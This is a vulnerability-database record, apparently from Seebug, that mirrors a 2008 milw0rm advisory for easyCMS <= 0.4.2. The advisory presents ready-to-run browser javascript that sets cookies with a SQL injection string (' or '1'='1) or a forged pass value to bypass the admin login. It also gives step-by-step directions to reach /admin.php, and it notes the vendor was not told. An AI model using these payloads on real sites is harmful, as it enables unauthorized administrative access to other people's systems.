{"href": "https://www.seebug.org/vuldb/ssvid-65409", "status": "poc", "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "easycms <= 0.4.2 - Multiple Vulnerabilities", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-65409", "cvelist": [], "description": "No description provided by source.", "viewCount": 2, "published": "2014-07-01T00:00:00", "sourceData": "\n --==+================================================================================+==--\n--==+\t\t easyCMS <= 0.4.2 Multiple Remote Vulnerabilitys \t +==--\n--==+================================================================================+==--\n\n\n\nDiscovered By: t0pP8uZz\nDiscovered On: 17 MAY 2008\nScript Download: http://ecomansys.sourceforge.net/\nDORK: N/A\n\n\n\nVendor Has Not Been Notified!\n\n\n\nDESCRIPTION: \n\neCMS (all versions avalible) suffers from multiple remote vulnerabilitys.\n\nthese include, Insecure Cookie Handling, SQL Injection. the version <= 0.2 allows a admin cookie to be set and\ngrant full access to the admin area.\n\nversions => 0.2 allows a simple sql statement to be inserted into the cookie bypassing the admin login.\n\nsee below for the vulnerabilitys.\n\n\n\nSQL Injection (version => 0.2):\n\njavascript:document.cookie = "user=' or '1'='1; path=/";\njavascript:document.cookie = "pass=admin; path=/";\n\nbefore running the above javascript in your browser, replace "admin" with the actual admin username.\nmost of the time "admin" should work. after running both javascripts on the affected website.\nyou can visit "/admin.php" to view admin panel.\n\n\n\nInsecure Cookie Handling (version <= 0.2):\n\njavascript:document.cookie = "pass=1; path=/";\n\nrunning the above javascript on a eCMS version <= 0.2 will grant admin access, after running visit "/admin.php"\n\n\n\nNOTE/TIP: \n\nno dork, since people replace the dork in "config.php"\n\n\nGREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew !\n\n\n\npeace, t0pP8uZz\n\n\n\n--==+================================================================================+==--\n--==+\t\t easyCMS <= 0.4.2 Multiple Remote Vulnerabilitys \t +==--\n--==+================================================================================+==--\n\n# milw0rm.com [2008-05-18]\n\n ", "id": "SSV:65409", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T15:33:19", "reporter": "Root", "enchantments": {"score": {"value": 0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.1}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645460058}}
easycms <= 0.4.2 - Multiple Vulnerabilities